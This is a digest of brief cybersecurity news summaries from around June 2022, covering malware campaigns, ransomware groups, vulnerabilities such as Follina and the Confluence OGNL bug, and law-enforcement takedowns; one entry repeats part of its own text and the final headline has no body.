    New ZuoRAT Malware Targets Soho Routers in North America, Europe

    Security researchers at Lumen’s Black Lotus Labs have uncovered a new remote access trojan (RAT) dubbed ZuoRAT. Since 2020, ZuoRAT has stayed under the radar, targeting remote workers via small office/home office (SOHO) routers across North America and Europe. “We identified a multistage remote access trojan (RAT) developed for SOHO devices that grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold”.

    Kaspersky Reveals Phishing Emails That Employees Find Most Confusing

    Phishing simulator data from Kaspersky’s Security Awareness Platform shows that workers tend to not notice pitfalls hidden in emails devoted to corporate issues and delivery problem notifications, with one in five (16% to 18%) clicking the link in the email templates imitating these phishing attacks. According to estimates, 91% of all cyberattacks begin with a phishing email, and phishing techniques are involved in 32% of all successful data breaches.

    APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

    Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors.

    Over 900,000 Kubernetes Instances Found Exposed Online

    Security researchers at Cyble recently uncovered over 900,000 misconfigured Kubernetes clusters that were exposed on the Internet to potentially malicious scans, some even vulnerable to data-exposing cyberattacks. For its part, Kubernetes is a highly versatile open-source container orchestration system for hosting online services and managing containerized workloads via a uniform API interface. Due to its scalability, flexibility in multi-cloud environments, portability, and cost, Kubernetes has seen a mass adoption by users in the last couple of years.

    Raccoon Stealer Is Back With a New Version to Steal Your Passwords

    The Raccoon Stealer malware is back with a second major version circulating on cybercrime forums, offering hackers elevated password-stealing functionality and upgraded operational capacity. The Raccoon Stealer operation shut down in March 2022 when its operators announced that one of the lead developers was killed during Russia’s invasion of Ukraine. The remaining team promised to return with a second version, relaunching the MaaS (malware as a service) project on upgraded infrastructure and with more capabilities.

    2022 CWE Top 25 Most Dangerous Software Weaknesses

    The Homeland Security Systems Engineering and Development Institute, sponsored by CISA and operated by MITRE, has released the 2022 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The list uses data from the National Vulnerability Database to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition. This year’s list also incorporates updated weakness data for recent Common Vulnerabilities and Exposure records in the dataset that are part of CISA’s Known Exploited Vulnerabilities Catalog.

    New Vulnerability Database Catalogs Cloud Security Issues

    A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them. The database — cloudvulndb.org — is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities that security researcher Scott Piper had previously compiled in a document on GitHub titled "Cloud Service Provider security mistakes." Going forward, anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues. The goal is to list issues that a cloud service provider might have already addressed.

    Android Malware ‘Revive’ Impersonates BBVA Bank’s 2FA App

    A new Android banking malware named Revive has been discovered that impersonates a MFA application required to log into BBVA bank accounts in Spain. The new banking trojan follows a more focused approach targeting the BBVA bank instead of attempting to compromise customers of multiple financial institutes. Revive appears to still be in the early phases of development, but includes some sophisticated functions, like it’s ability to intercept multi-factor authentication (MFA) codes and one-time passwords.

    Fake Copyright Infringement Emails Install LockBit Ransomware

    The emails, which were discovered by researchers at AhnLab in Korea, did not identify which files were inappropriately utilized in the body of the message; rather, they instructed the receiver to download and open the attached file in order to see the infringing material. Similar to traditional phishing campaign the attachment is a ZIP file, encrypted with a password and contains a compressed file. The compressed file contains an executable that seems to be a PDF document but is really an NSIS installation for the Lockbit 2.0 ransomware. The recipients of these emails are warned about a copyright violation, allegedly having used media files without the creator’s license. These emails demand that the recipient remove the infringing content from their websites, or they will face legal action.

    Cyberattack Halted the Production at the Iranian state-owned Khuzestan Steel Company

    Iran is the leading producer of steel in the Middle East and among the top 10 in the world, according to the World Steel Association. Its iron ore mines provide raw materials for domestic production and are exported to dozens of countries, including Italy, China and the United Arab Emirates. With that said, “One of Iran’s major steel companies said on Monday it was forced to halt production after being hit by a cyberattack, apparently marking one of the biggest such assaults on the country’s strategic industrial sector in recent memory.” The state-owned Khuzestan Steel Company said experts had determined the plant had to stop work until further notice “due to technical problems” following “cyberattacks.” The company’s website was down on Monday.

    Cyberattack Against Ukrainian Telecommunications Operators Using DarkCrystal RAT Malware

    The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a new malware distribution campaign targeting Ukrainian telecommunication operators with DarkCrystal RAT. DarkCrystal is a remote access trojan that first came into the spotlight in 2018. Written in the .NET programming language, DarkCrystal can be used by threat actors to perform surveillance, reconnaissance, remote code execution, and DDoS attacks.

    LockBit 3.0 Introduces the First Ransomware Bug Bounty Program

    Over the weekend, the LockBit ransomware group released a revamped ransomware-as-a-service (RaaS) operation called LockBit 3.0 after beta testing for the past two months, with the new version already used in attacks. While it is unclear what technical changes were made to LockBit’s encryptor, its ransom notes are no longer named 'Restore-My-Files.txt' and instead have moved to the naming format, [id].README.txt.

    Clever Phishing Method Bypasses MFA Using Microsoft WebView2 Apps

    A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victim's authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts” (Bleeping Computer, 2022). Data breaches and phishing campaigns have led to a large number of exposed login credentials. The increased adoption of multi-factor authentication (MFA) has made it difficult for cybercriminals to take advantage of these stolen and leaked credentials. As a result, they continue to look for ways to bypass MFA.

    Malicious Windows ‘LNK’ Attacks Made Easy With New Quantum Builder

    Researchers at Cyble recently came across a new tool called Quantum that can be used by cybercriminals to build malicious .LNK files. LNKs are Windows shortcut files that can contain malicious code to abuse legitimate tools on the system, the so-called living-off-the-land binaries (LOLBins), such as PowerShell or the MSHTA that is used to execute Microsoft HTML Application (HTA) files. Due to this, LNKs are extensively used for malware distribution, especially in phishing campaigns, with some notable malware families currently using them being Emotet, Bumblebee, Qbot, and IcedID.

    Conti Ransomware Finally Shuts Down Data Leak, Negotiation Sites

    The Conti ransomware operation has finally shut down its last public-facing infrastructure, consisting of two Tor servers used to leak data and negotiate with victims, closing the final chapter of the notorious cybercrime brand. According to threat intel analyst Ido Cohen, Conti’s servers were shut down on Wednesday and BleepingComputer has confirmed they are still offline as of today. The news comes after BleepingComputer reported in May that Conti had started to shut down their operations, telling members that the brand was no more and that its internal infrastructure had been decommissioned, including communication and storage servers.

    Spyware Vendor Works with ISPs to Infect iOS and Android Users

    Google's Threat Analysis Group (TAG) revealed today that RCS Labs, an Italian spyware vendor, has received help from some Internet service providers (ISPs) to infect Android and iOS users in Italy and Kazakhstan with commercial surveillance tools. Google tracks more than 30 spyware vendors. RCS Labs’ spyware uses drive-by-downloads (T1608.004) to infect multiple victims. The targets are generally prompted to install malicious apps (T1204.002), which are mimicking legitimate mobile carrier apps (T1036). The victim will appear to lose Internet connection, and will have to install the malicious app to get back online with their ISP.

    Hackers Exploit Mitel VoIP Zero-Day Bug to Deploy Ransomware

    A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.

    Chinese Hackers Target Script Kiddies With Info-Stealer Trojan

    Cybersecurity researchers have discovered a new campaign attributed to the Chinese "Tropic Trooper" hacking group, which employs a novel loader called Nimbda and a new variant of the Yahoyah trojan. The trojan is bundled in a greyware tool named 'SMS Bomber,' which is used for denial of service (DoS) attacks against phones, flooding them with messages. Tools like this are commonly used by "beginner" threat actors who want to launch attacks against sites. According to a report by Check Point, the threat actors also demonstrate in-depth cryptographic knowledge, extending the AES specification in a custom implementation.

    Conti Ransomware Hacking Spree Breaches Over 40 Orgs in a Month

    Today, cybersecurity firm Group-IB published a report detailing what researchers refer to as one of the “shortest yet most successful” campaigns conducted by the Conti ransomware group. Codenamed ARMattack, the campaign occurred last year, between November 17 and December 20, 2021. Within a span of one month, Conti affiliates were able to compromise more than 40 organizations in various sectors across the world.

    Windows 10 and Windows 11 Downloads Blocked in Russia

    People in Russia can no longer download Windows 10 and Windows 11 ISOs and installation tools from Microsoft, with no reason for the block provided by the company. Russia's TASS news agency first reported this problem over the weekend, and the news quickly spread on Twitter. Using a VPN server located in Russia, BleepingComputer has confirmed that attempting to download the Windows 10 Update Assistant, the Windows 10 Media Creation Tool, and the Windows 11 Installation Assistant, Russian users are shown a message stating, "404 - File or Directory not found.

    Critical PHP Flaw exposes QNAP NAS devices to RCE attacks

    QNAP has warned customers today that some of its Network Attached Storage (NAS) devices (with non-default configurations) are vulnerable to attacks that would exploit a three-year-old critical PHP vulnerability allowing remote code execution. "A vulnerability has been reported to affect PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24, and 7.3.x below 7.3.11. If exploited, the vulnerability allows attackers to gain remote code execution," QNAP explained in a security advisory released today.

    Russian Govt Hackers Hit Ukraine With Cobalt Strike, CredoMap Malware

    The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons. According to an advisory published by Microsoft, Follina is a “remote code execution vulnerability that exists when “MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

    Researchers Uncover Ways to Break the Encryption of 'MEGA' Cloud Storage Service

    A new piece of research from academics at ETH Zurich has identified a number of critical security issues in the MEGA cloud storage service that could be leveraged to break the confidentiality and integrity of user data. With more than 10 million daily active users and with over 122 billion files uploaded to the platform to date, MEGA promises user-controlled end-to-end Encryption (UCE). However, researchers pointed out in their paper titled “MEGA: Malleable Encryption Goes Awry”, that MEGA’s system does not protect its users against a malicious server, thereby enabling a rogue actor to fully compromise the privacy of the uploaded files.

    Europol Busts Phishing Gang Responsible for Millions in Losses

    Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation was carried out with the help of law enforcement authorities from Belgium and the Netherlands. In total, nine individuals were arrested. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and Spijkenisse and a 25-year-old woman from Deventer, according to a statement from the National Police Force.

    Crooks are Using RIG Exploit Kit to Push Dridex Instead of Raccoon Stealer

    Since January 2022, the Bitdefender Cyber Threat Intelligence Lab observed operators behind the RIG Exploit Kit pushing the Dridex banking trojan instead of the Raccoon Stealer. The switch occurred in February when Raccoon Stealer temporarily halted its activity as one of its developers was killed in the Russian invasion of Ukraine. First seen in 2019, Raccoon stealer was offered on the dark web for sale as a malware-as-a-service. It is designed to steal victims credit card data, email credentials, and cryptocurrency wallets.

    Researchers Disclose 56 Vulnerabilities Impacting OT Devices from 10 Vendors

    Nearly five dozen security vulnerabilities have been disclosed in devices from 10 operational technology (OT) vendors due to what researchers call are "insecure-by-design practices." Collectively dubbed OT:ICEFALL by Forescout, the 56 issues span as many as 26 device models from Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron, Phoenix Contact, Siemens, and Yokogawa. "Exploiting these vulnerabilities, attackers with network access to a target device could remotely execute code, change the logic, files or firmware of OT devices, bypass authentication, compromise credentials, cause denials of service or have a variety of operational impacts," the company said in a technical report.

    New ToddyCat APT group targets Exchange servers in Asia, Europe

    Security researchers with Kaspersky’s Global Research & Analysis Team (GReAT) recently unveiled an unknown APT group dubbed ToddyCat that has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. While tracking the group’s activity, researchers found a previously unknown passive backdoor they named Samurai and new trojan malware dubbed Ninja Trojan. Both malware strains allow the attackers to take control of infected systems and move laterally within the victims' networks.

    New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain

    A new kind of Windows NTLM relay attack dubbed DFSCoerce has been uncovered that leverages the Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM) to seize control of a domain. The NTLM (NT Lan Manager) relay attack is a well-known method that exploits the challenge-response mechanism. It allows malicious parties to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to networkA new kind of Windows NTLM relay attack dubbed DFSCoerce has been uncovered that leverages the Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM) to seize control of a domain. The NTLM (NT Lan Manager) relay attack is a well-known method that exploits the challenge-response mechanism. It allows malicious parties to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources, effectively gaining an initial foothold in Active Directory environments. resources, effectively gaining an initial foothold in Active Directory environments.

    Cisco Says It Won’t Fix Zero-Day RCE in End-Of-Life VPN Routers

    Cisco is advising owners of end-of-life Small Business RV routers to upgrade to newer models after disclosing a remote code execution vulnerability that will not be patched. The vulnerability is tracked as CVE-2022-20825 and has a CVSS severity rating of 9.8 out of 10.0. According to a Cisco security advisory, available here: https://tools.cisco.com/security/ce...rityAdvisory/cisco-sa-sb-rv-overflow-s2r82P9v The flaw exists due to insufficient user input validation of incoming HTTP packets on the impacted devices. An attacker could exploit it by sending a specially crafted request to the web-based management interface, resulting in command execution with root-level privileges. The vulnerability impacts four Small Business RV Series models, namely the RV110W Wireless-N VPN Firewall, RV130 VPN Router RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router Cisco states that they will not be releasing a security update to address CVE-2022-20825 as the devices are no longer supported. Furthermore, there are no mitigations available other than to turn off remote management on the WAN interface, which should be done regardless for better overall security.

    New Phishing Attack Infects Devices with Cobalt Strike

    Security researchers have noticed a new malicious spam campaign that delivers the 'Matanbuchus' malware to drop Cobalt Strike beacons on compromised machines (T1105 - Ingress Tool Transfer). Cobalt Strike is a penetration testing suite that is frequently used by threat actors for lateral movement and to drop additional payloads.

    Websites Hosting Fake Cracks Spread Updated CopperStealer Malware

    Researchers from TrendMicro noticed a new version of CopperStealer and analyzed these samples to be related to a previous campaign we’ve documented. We examined this new version reusing parts of code and observed the following similarities from previous versions:

    • The same cryptor
    • Use of Data Encryption Standard (DES) with the same key
    • The same name of the DLL export function (for later versions of CopperStealer)
    • Data exfiltration to a Telegram channel (for later versions of CopperStealer)
    • Use of the executable utility MiniThunderPlatform

    The newly updated malware has several capabilities and attack stages, with the initial infection vector consisting of a website offering fake cracks. These websites usually display two buttons, one offering to download and the other to set up the desired cracks. Selecting either button begins the redirection chain, requiring the user to select another “Download” button. Afterward, a download prompt appears and the user is prompted to save the file to the computer.

    Russian RSocks Botnet Disrupted After Hacking Millions of Devices

    The U.S. Department of Justice has announced the disruption of the Russian RSocks malware botnet used to hijack millions of computers, Android smartphones, and IoT (Internet of Things) devices worldwide for use as proxy servers. The law enforcement operation involved the FBI and police forces in Germany, the Netherlands, and the United Kingdom, where the botnet maintained parts of its infrastructure.

    Over a Million WordPress Sites Forcibly Updated to Patch a Critical Plugin Vulnerability

    WordPress websites using a widely used plugin named Ninja Forms have been updated automatically to remediate a critical security vulnerability that's suspected of having been actively exploited in the wild. The issue, which relates to a case of code injection, is rated 9.8 out of 10 for severity and affects multiple versions starting from 3.0. It has been fixed in 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11.

    Researchers Uncover 'Hermit' Android Spyware Used in Kazakhstan, Syria, and Italy

    An enterprise-grade surveillanceware dubbed Hermit has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed. Lookout Threat Lab attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front company. The San Francisco-based cybersecurity firm said it detected the campaign aimed at Kazakhstan in April 2022.

    Cisco Secure Email Bug Can Let Attackers Bypass Authentication

    Yesterday, Cisco released a security advisory to address a critical vulnerability that could allow attackers to bypass authentication and login into the web management interface of Cisco email gateway appliances with non-default configurations. Tracked as CVE-2022-20798, the flaw resides in the external authentication functionality of virtual and hardware Cisco Email Security Appliance (ESA) and Cisco Secure Email and Web Manager appliances. “This vulnerability is due to improper authentication checks when an affected device uses Lightweight Directory Access Protocol (LDAP) for external authentication. An attacker could exploit this vulnerability by entering a specific input on the login page of the affected device. A successful exploit could allow the attacker to gain unauthorized access to the web-based management interface of the affected device”

    Microsoft Office 365 Feature Can Help Cloud Ransomware Attacks

    Security researchers are warning that threat actors could hijack Office 365 accounts to encrypt for a ransom the files stored in SharePoint and OneDrive services that companies use for cloud-based collaboration, document management and storage. A ransomware attack targeting files on these services could have severe consequences if backups aren’t available, rendering important data inaccessible to owners and working groups.

    Extortion Gang Ransoms Shoprite, Largest Supermarket Chain in Africa

    Shoprite Holdings, Africa's largest supermarket chain that operates almost three thousand stores across twelve countries in the continent, has been hit by a ransomware attack. Shoprite is Africa's largest supermarket chain, with a revenue of $5.8 billion and 149,000 employees. The retailer has 2,943 stores, serving millions of customers in South Africa, Nigeria, Ghana, Madagascar, Mozambique, Namibia, DRC, Angola, and other countries.

    Internet Explorer (Almost) Breathes Its Final Byte on Wednesday

    Microsoft will finally end support for Internet Explorer on multiple Windows versions on Wednesday, June 15, almost 27 years after its launch on August 24, 1995. After finally reaching its end of life, the Internet Explorer desktop application will be disabled. It will be replaced with the new Chromium-based Microsoft Edge, with users automatically redirected to Edge when launching IE11.

    Panchan: A New Golang-based Peer-To-Peer Botnet Targeting Linux Servers

    Security researchers at Akamai uncovered a new Golang-based peer-to-peer (P2P) botnet that has been actively targeting Linux servers in the education sector. Dubbed Panchan, the botnet was first spotted by Akamai on March 19, 2022. Since its emergence in March, Panchan has managed to infect 209 systems, 40 of which are currently active. Most of the compromised machines are located in Asia (64), followed by Europe (52), North America (45), South America (11), Africa (1), and Oceania (1). According to researchers, Panchan “utilizes its built-in concurrency features to maximize spreadability and execute malware modules” and harvests SSH keys to perform lateral movement. Panchan’s approach to harvesting SSH keys is rather unique. Unlike other botnets which just brute force or perform dictionary attacks on randomized IP addresses, Panchan also “reads the id_rsa and known_hosts files to harvest existing credentials and uses them to move laterally across the network”

    Citrix Warns Critical Bug Can Let Attackers Reset Admin Passwords

    Citrix on Tuesday released a security advisory warning its customers of a critical vulnerability in Citrix Application Delivery Management that can let unauthenticated attackers login as administrator and reset the admin password. Citrix ADM is a web-based solution that provides admins with a centralized cloud-based console for managing on-premises or cloud Citrix deployments, including Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix Secure Web Gateway.

    Microsoft: June Windows Server Updates May Cause Backup Issues

    Microsoft says that some applications might fail to backup data using Volume Shadow Copy Service (VSS) after applying the June 2022 Patch Tuesday Windows updates. The issue occurs due to security enforcement introduced to address an elevation of privilege vulnerability (CVE-2022-30154) in the Microsoft File Server Shadow Copy Agent Service (RVSS). On systems where this known issue is experienced, Windows backup applications may receive E_ACCESSDENIED errors during shadow copy creation operations, and a "FileShareShadowCopyAgent Event 1013" will be logged on the File Server. "Since RVSS is an optional component, Windows Server systems are not vulnerable by default. Additionally, Windows Client editions are not vulnerable to attacks using CVE-2022-30154 exploits in privilege escalation attempts."

    Ransomware Gang Creates Site for Employees to Search for Their Stolen Data

    The ALPHV ransomware gang, aka BlackCat, has brought extortion to a new level by creating a dedicated website that allows the customers and employees of their victim to check if their data was stolen in an attack. The ransomware operators released stolen data today from a hotel and spa in Oregon. The group claims to have stolen 112GBs of data, including employee information and social security numbers for 1,500 employees. Instead of simply leaking the data on their TOR data leak site, the group created a dedicated website allowing both customers and employees to check if their data was stolen during the attack. Using this site, employees, customers, or anyone for that matter, can see information about hotel guests and their stays or the personal data of 1,534 employees.

    Microsoft: Exchange Servers Hacked to Deploy BlackCat Ransomware

    Microsoft says BlackCat ransomware affiliates are now attacking Microsoft Exchange servers using exploits targeting unpatched vulnerabilities. In at least one incident that Microsoft's security experts observed, the attackers slowly moved through the victim's network, stealing credentials and exfiltrating information to be used for double extortion. Two weeks after the initial compromise using an unpatched Exchange server as an entry vector, the threat actor deployed BlackCat ransomware payloads across the network via PsExec.

    Researchers Detail PureCrypter Loader Cyber Criminals Using to Distribute Malware

    Cybersecurity researchers have detailed the workings of a fully-featured malware loader dubbed PureCrypter that's being purchased by cybercriminals to deliver remote access trojans (RATs) and information stealers. "The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption, and obfuscation to evade antivirus software products," Zscaler's Romain Dumont said in a new report.

    Cloudflare Mitigates Record-Breaking HTTPS DDoS Attack

    Internet infrastructure firm Cloudflare said today that it mitigated a 26 million request per second distributed denial-of-service (DDoS) attack, the largest HTTPS DDoS attack detected to date. The record-breaking attack occurred last week and targeted one of Cloudflare's customers using the Free plan. The threat actor behind it likely used hijacked servers and virtual machines seeing that the attack originated from Cloud Service Providers instead of weaker Internet of Things (IoT) devices from compromised Residential Internet Service Providers.

    Iranian Spear-Phishing Operation Targets Former Israeli and US High-Ranking Officials

    Check Point Research uncovers a recent Iranian-based spear-phishing operation aimed against former Israeli officials, high-ranking military personnel, research fellows in research institutions, think tanks, and against Israeli citizens. The attacks use a custom phishing infrastructure, as well as a wide array of fake email accounts to impersonate trusted parties. To establish deeper trust with new targets, the threat actors performed an account takeover of some victims’ inboxes , and then hijacked existing email conversations to start attacks from an already existing email conversation between a target and a trusted party and continue that conversation in that guise.

    Microsoft Mitigates RCE Vulnerability Affecting Azure Synapse and Data Factory

    Microsoft has incorporated additional improvements to address the recently disclosed SynLapse security vulnerability in order to meet comprehensive tenant isolation requirements in Azure Data Factory and Azure Synapse Pipelines. The latest safeguards include moving the shared integration runtimes to sandboxed ephemeral instances and using scoped tokens to prevent adversaries from using a client certificate to access other tenants' information.

    Hello XD Ransomware Now Drops a Backdoor While Encrypting

    Cybersecurity researchers report increased activity of the Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption. Hello XD was first spotted in wild on November 2021 and is based on the leaked source code of another ransomware known as Babuk. Unlike other ransomware groups, this particular ransomware family does not have a data leak site. Rather, it prefers to direct the impacted victim to negotiations through Tox chat and onion-based messenger instances.

    Russian Hackers Start Targeting Ukraine With Follina Exploits

    Ukraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. The security issue can be triggered by either opening or selecting a specially crafted document and threat actors have been exploiting it in attacks since at least April 2022.

    New Syslogk Linux Rootkit Uses Magic Packets to Trigger Backdoor

    A new Linux rootkit malware named ‘Syslogk’ is being used in attacks to hide malicious processes, using specially crafted "magic packets" to awaken a backdoor laying dormant on the device. The malware is currently under heavy development, and its authors appear to base their project on Adore-Ng, an old open-source rootkit. Syslogk can force-load its modules into the Linux kernel (versions 3.x are supported), hide directories and network traffic, and eventually load a backdoor called ‘Rekoobe.’”

    Confluence Servers Hacked to Deploy AvosLocker, Cerber2021 Ransomware

    Ransomware gangs are now targeting a recently patched and actively exploited remote code execution (RCE) vulnerability affecting Atlassian Confluence Server and Data Center instances for initial access to corporate networks. If successfully exploited, this OGNL injection vulnerability (CVE-2022-26134) enables unauthenticated attackers to take over unpatched servers remotely by creating new admin accounts and executing arbitrary code.

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPul

    A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa. Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017.

    Hackers Exploit Recently Patched Confluence Bug for Cryptomining

    Security researchers at Check Point recently observed a crypto mining hacking group known as “8220 gang” exploiting a code execution flaw in Atlassian Confluence servers to install miners on vulnerable servers. "The vulnerability, tracked as CVE-2022-26134, was discovered as an actively exploited zero-day at the end of May, while the vendor released a fix on June 3, 2022. Various proof of concept (PoC) exploits were released in the days that followed, giving a broader base of malicious actors an easy way to exploit the flaw for their purposes” .

    Researchers Detail How Cyber Criminals Targeting Cryptocurrency Users

    Cybercriminals are impersonating popular crypto platforms such as Binance, Celo, and Trust Wallet with spoofed emails and fake login pages in an attempt to steal login details and deceptively transfer virtual funds. "As cryptocurrency and non-fungible tokens (NFTs) become more mainstream, and capture headlines for their volatility, there is a greater likelihood of more individuals falling victim to fraud attempting to exploit people for digital currencies," Proofpoint said in a new report.

    Researchers Disclose Critical Flaws in Industrial Access Control System from Carrier

    Multiple vulnerabilities were disclosed in Carrier’s LenelS2 Mercury access control system that’s used widely in healthcare, education, transportation, and government facilities. LenelS2 is employed in environments to grant physical access to privileged facilities and can be integrated with more complex building automation deployments. A total of 8 vulnerabilities were disclosed which relate to a protection mechanism failure, forced browsing, buffer overflow, path traversal, and OS command injection. According to the security advisory published by CISA, successful exploitation of these vulnerabilities could allow an attacker access to the device, allowing monitoring of all communications sent to and from the device, modification of onboard relays, changing of configuration files, device instability, and a denial-of-service condition.

    Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store

    Today, security researcher MalwareHunterTeam found a new ransomware named 'WannaFriendMe' that impersonates the notorious Ryuk Ransomware. However, in reality, it is a variant of the Chaos Ransomware. A new ransomware is taking the unusual approach of selling its decryptor on the Roblox gaming platform using the service's in-game Robux currency. Roblox is an online kids gaming platform where members can create their own games and monetize them by selling Game Passes, which provide in-game items, special access, or enhanced features. To pay for these Game Passes, members must purchase them using an in-game currency called Robux.

    Phishing Hits All-Time High in Q1 2022

    “The first quarter of 2022 saw phishing attacks hit a record high, topping one million for the first time, according to data from the Anti Phishing Working Group (APWG)” (Info Security Magazine, 2022). The group released the details in their Phishing Activity Trends Report. March apparently was the worst month with 384,000 attacks.

    Chinese Hacking Group Aoqin Dragon Quietly Spied Orgs for a Decade

    A previously unknown Chinese-speaking threat actor has been discovered by threat analysts SentinelLabs who were able to link it to malicious activity going as far back as 2013. Named Aoqin Dragon, the hacking group is focused on cyber-espionage, targeting government, education, and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia.

    New Emotet Variant Stealing Users' Credit Card Information from Google Chrome

    The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser. The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint, which observed the component on June 6.

    Vice Society Ransomware Claims Attack on Italian City of Palermo

    The Vice Society ransomware group has claimed responsibility for the recent cyber attack on the city of Palermo in Italy, which has caused a large-scale service outage. The attack occurred last Friday, and all internet-relying services remain unavailable, impacting 1.3 million people and many tourists visiting the city.

    The Most Dangerous Attacks of 2022

    The 2022 edition was a bit more somber than past editions, following the passing of SANS founder Alan Paller who moderated the panel for over a decade. Ed Skoudis, fellow and director at SANS Institute, started the 2022 panel with a moving tribute to Paller, who was mentioned more than once during the session as the inspiration for how cybersecurity education can and should continue to improve.

    New Symbiote Malware Infects All Running Processes on Linux Systems

    This novel threat was discovered and analyzed by BlackBerry and Intezer Labs researchers, who worked together to uncover all aspects of the new malware in a detailed technical report. According to them, Symbiote has been under active development since last year. In recent attack's the malware has new capabilities that infects all running processes on compromised systems, steals account credentials, and gives its operators backdoor access, “The new malware is primarily used for automated credential harvesting from hacked Linux devices by hooking the "libc read" function. This is a crucial mission when targeting Linux servers in high-value networks, as stealing admin account credentials opens the way to unobstructed lateral movement and unlimited access to the entire system.”

    Linux Version of Black Basta Ransomware Targets VMware ESXi servers

    Threat Research analysts at Uptcys uncovered new Black Basta ransomware binaries which revealed that the ransomware gang now supports the encryption of VMware ESXi virtual machines running on enterprise Linux servers. “Most ransomware groups are now focusing their attacks on ESXi VMs since this tactic aligns with their enterprise targeting. It also makes it possible to take advantage of faster encryption of multiple servers with a single command. Encrypting VMs makes sense since many companies have recently migrated to virtual machines as they allow for easier device management and a lot more efficient resource usage.

    Poisoned CCleaner Search Results Spread Information-Stealing Malware

    Malware that steals your passwords, credit cards, and crypto wallets is being promoted through search results for a pirated copy of the CCleaner Pro Windows optimization program. This new malware distribution campaign is dubbed “FakeCrack,” and was discovered by analysts at Avast, who report detecting an average of 10,000 infection attempts every day from its customer telemetry data. Most of these victims are based in France, Brazil, Indonesia, and India. The malware distributed in this campaign is a powerful information stealer that can harvest personal data and cryptocurrency assets and route internet traffic through data-snatching proxies.

    US Seizes SSNDOB Market for Selling Personal Info of 24 Million People

    On Tuesday, the U.S Department of Justice announced the shutdown of SSNDOB, an illicit online marketplace that sold the names, social security numbers, and dates of birth of approximately 24 million US people. The operation was conducted by the FBI, the Internal Revenue Service, and the Department of Justice, with significant help from the Cyprus Police. In total, four domains hosting the SSNDOB marketplace were seized, including SSNDOB[.]club, SSNDOB[.]vip, SSNDOB[.]ws, blackjob[.]biz

    New ‘Dogwalk’ Windows Zero-Day Bug Gets Free Unofficial Patches

    This vulnerability was first publicly disclosed by security researchers in January 2020 after Microsoft replied to reports saying they wouldn't provide a fix because it was not a security issue. However, the bug was recently re-discovered and brought to public attention by security researcher j00sean. The security flaw (jokingly dubbed DogWalk) is a path traversal flaw attackers can exploit to copy an executable to the Windows Startup folder when the target opens a maliciously crafted .diagcab file (received via email or downloaded from the web). While Microsoft said that Outlook users are not at risk because .diagcab files are automatically blocked, security researchers and experts argue that exploiting this bug is still a valid attack vector.

    Chinese Government Hackers Breached Telcos to Snoop on Network Traffic

